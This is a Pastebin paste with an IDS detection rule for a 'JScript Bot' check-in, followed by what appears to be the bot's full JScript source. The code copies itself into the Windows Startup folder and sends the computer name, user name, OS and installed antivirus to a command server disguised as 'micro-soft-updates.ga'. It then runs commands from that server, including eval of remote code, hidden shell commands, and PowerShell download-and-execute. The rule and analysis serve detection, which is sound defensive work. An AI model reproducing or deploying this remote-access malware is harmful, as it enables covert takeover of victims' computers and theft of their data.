Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- alert tcp $HOME_NET any -> $EXTERNAL_NET !$HTTP_PORTS (msg:"JScript Bot Initial Checkin"; flow:established,to_server; content:"POST"; http_method; content:"User-Agent|3a| xmsSofts_1.0.0_"; content:"Content-Length|3a 20|0"; http_header; classtype:trojan-activity; sid:20166280; rev:1; metadata:created_at 2019_01_06;)
- var shell = new ActiveXObject('WScript.Shell');
- var fstym = new ActiveXObject('Scripting.FileSystemObject');
- var spl = '|V|';
- var Ch = '\\';
- var VN = 'xmsSofts_1.0.0' + '_' + getSerial();
- var Startup = getEnv('appdata') + '\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\';
- var StartupAll = getEnv('allusersprofile') + '\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\';
- var Temp = getEnv('temp') + '\\';
- var fxDmE4zu = WScript.ScriptFullName;
- var wn = WScript.ScriptName;
- var UDex;
- var DeLay = 20;
- ModinySks();
- do {
- try {
- var send = SendHttp();
- var Command = send.split(spl);
- var order = Command[0];
- var order_data = Command[1];
- if (order === 'Ex') {
- eval(order_data);
- }
- if (order === 'Cmd') {
- shell.Run(order_data, 0, false);
- }
- if (order === 'DwnlExe') {
- var path = Temp + Command[2];
- shell.Run("powershell.exe $WebClient =New-Object System.Net.WebClient;$WebClient.AllowAutoRedirect=true;$WebClient.DownloadFile('" + Command[1] + "','" + path + "')", 0, false);
- WScript.Sleep(DeLay * 1000);
- shell.Run('powershell.exe start ' + path, 0, false);
- }
- if (order === 'SelfRemove') {
- shell.Run("powershell.exe del '" + Startup + wn + "'", 0, false);
- shell.Run("powershell.exe del '" + fxDmE4zu + "'", 0, false);
- WScript.Quit(1);
- }
- if (order === 'UpdateS') {
- var path = Temp + Command[2];
- shell.Run("powershell.exe $WebClient =New-Object System.Net.WebClient;$WebClient.AllowAutoRedirect=true;$WebClient.DownloadFile('" + Command[1] + "','" + path + "')", 0, true);
- if (fstym.fileexists(path)) {
- shell.Run("powershell.exe del '" + Startup + wn + "'", 0, false);
- shell.Run("powershell.exe del '" + fxDmE4zu + "'", 0, false);
- WScript.Sleep(DeLay * 1000);
- shell.Run("powershell.exe start '" + path + "'", 0, false);
- WScript.Quit(1);
- }
- }
- } catch (err) {
- util_log('>>> Silencing catch ' + _inspect(err));
- }
- WScript.Sleep(5000);
- } while (true);
- function SendHttp(R) {
- var X = new ActiveXObject('Microsoft.XMLHTTP');
- X.open('POST', 'http://micro-soft-updates.ga:8880/connect', false);
- var useragent = getUserAgent();
- X.SetRequestHeader('User-Agent:', useragent);
- X.send(R);
- return X.responsetext;
- }
- function getUserAgent() {
- var s, NT, i;
- if (fstym.fileexists(getEnv('Windir') + '\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe')) {
- NT = 'YES';
- } else {
- NT = 'NO';
- }
- s = VN + Ch + jsUcfirst(getEnv('COMPUTERNAME')) + Ch + jsUcfirst(getEnv('USERNAME')) + Ch + jsUcfirst(getSystem() + '[' + getOSVer() + ']') + Ch + jsUcfirst(getAntiV()) + Ch + NT + Ch + UDex + Ch;
- return s;
- }
- function getEnv(S) {
- return shell.ExpandEnvironmentStrings('%' + S + '%');
- }
- function getSerial() {
- var s;
- s = GetObject('winmgmts:').InstancesOf('win32_logicaldisk');
- var en = new Enumerator(s);
- for (; !en.atEnd(); en.moveNext()) {
- var it = en.item();
- return it.volumeserialnumber;
- break;
- }
- }
- function getSystem() {
- var s = GetObject('winmgmts:').InstancesOf('Win32_OperatingSystem');
- var en = new Enumerator(s);
- for (; !en.atEnd(); en.moveNext()) {
- var it = en.item();
- return it.Caption;
- break;
- }
- }
- function getOSVer() {
- return GetObject("winmgmts:root\\cimv2:Win32_Processor='cpu0'").AddressWidth;
- }
- function getAntiV() {
- var s;
- var finalx = [];
- var wmg = 'winmgmts:\\\\localhost\\root\\securitycenter';
- try {
- s = GetObject(wmg).InstancesOf('AntiVirusProduct');
- var en = new Enumerator(s);
- for (; !en.atEnd(); en.moveNext()) {
- var it = en.item();
- var str = it.DisplayName;
- finalx.push(str);
- }
- } catch (e) {
- util_log('>>> Silencing catch ' + _inspect(e));
- }
- if (str !== '') {
- wmg = wmg + '2';
- try {
- s = GetObject(wmg).InstancesOf('AntiVirusProduct');
- en = new Enumerator(s);
- for (; !en.atEnd(); en.moveNext()) {
- it = en.item();
- var str = it.DisplayName;
- finalx.push(str);
- }
- } catch (e) {
- util_log('>>> Silencing catch ' + _inspect(e));
- }
- } else {
- }
- var finalxsrt = finalx.join(' , ');
- return finalxsrt;
- }
- function ModinySks() {
- try {
- shell.Run("powershell.exe Copy-Item -Path '" + fxDmE4zu + "' -Destination '" + Startup + wn + "'", 0, false);
- } catch (err) {
- util_log('>>> Silencing catch ' + _inspect(err));
- }
- }
- function jsUcfirst(string) {
- var strx = string.charAt(0).toUpperCase() + string.slice(1);
- strx = strx.replace('\\', '');
- return strx;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement